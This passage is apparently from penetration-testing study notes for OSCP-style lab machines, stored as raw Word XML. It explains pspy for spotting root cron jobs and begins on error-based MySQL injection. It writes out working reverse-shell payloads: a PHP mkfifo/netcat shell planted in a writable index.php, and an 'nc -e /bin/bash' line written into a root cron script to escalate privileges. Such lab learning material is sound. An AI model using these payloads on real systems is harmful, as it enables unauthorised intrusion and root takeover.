          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4750192" cy="2405546"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="269" name="image265.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image265.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId443"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4750192" cy="2405546"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000164A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1210"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We go inspect </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/tmp/sv</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and we see that index.php is writable, which means we can add a reverse shell to index.php, trigger it by curling 127.0.0.1:57, and then getting reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000164B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1210"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nano into index.php, and replace it with this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000164C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000164D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2&gt;&amp;1|nc 192.168.49.56 9001 &gt; /tmp/f");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000164E">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pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_khop5jxnjbfh" w:id="186"/>
      <w:bookmarkEnd w:id="186"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pspy </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001654">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Why use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pspy </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and not</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ps aux</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001655">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Doesn’t require root — uses /proc to watch for new processes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001656">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ps aux</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> skips a lot of information without root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001657">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Can reveal scheduled tasks, cron jobs, timers, and background scripts you’d miss with ps.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001658">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Great for privilege escalation — can catch scripts run by root that you might be able to modify or abuse.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001659">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It is continuously running while </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ps aux</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is just a static screenshot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000165A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also used in the Relia Challenge Lab for .19 machine along with the Borg binary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000165D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId444">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">GlasgowSmile</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, they used pspy to see if there were any cron jobs or scripts running that looked suspicious. You can use either pspy64 or pspy32</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000165E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000165F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./pspy64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001660">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001661">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1181100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="316" name="image323.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image323.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId445"/>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662">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1248"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">There is this script running with root privileges as UID=0 every one minute, this means any security checks are bypassed for them</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001663">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001664">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/sh -c /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is a shell script that executes the contents of the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/home/penguin/SomeoneWhoHidesBehindAMask/.trash_old</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. The -c flag tells the sh shell to interpret the following argument as a command to execute.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001665">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001666">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, we overwrite the script, to hopefully get us a reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001667">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="400"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo 'nc -e /bin/bash 192.168.45.160 6666' &gt; .trash_old</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001668">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001669">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now wait for 1 minute and go to your listener netcat shell where you should have root!!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000166A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000166B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">—---------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000166C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000166D">
      <w:pPr>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t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SunsetDecoy </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play seemed to have many different ways to get privilege escalation. In </w:t>
      </w:r>
      <w:hyperlink r:id="rId446">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">this</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> version of the walkthrough, they used the antivirus scan capability. And then in </w:t>
      </w:r>
      <w:hyperlink r:id="rId447">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">this</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> version of the walkthrough, they used CHKROOTKIT. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000166F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1254"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But one thing they both had in common is that they both used </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pspy64</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, a tool that monitors processes running on the system without requiring root access. It shows scheduled tasks, cron jobs, and processes triggered by system activity.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001670">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016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2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_nh9m1fnbezlt" w:id="187"/>
      <w:bookmarkEnd w:id="187"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Identifying SQLi via Error-based Payloads (for mysql)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001673">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001674">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OSCP 10.2.1. Identifying SQLi via Error-based Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001675">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001676">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this example, they use</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> mysql</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001677">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001678">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can try using characters like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">in the username field, and if you get an error on the webpage, then you likely have SQL injection </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001679">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="703"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3986213" cy="2197527"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="500" name="image502.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image502.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId448"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3986213" cy="21975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7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="703"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Random password provided</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000167B">
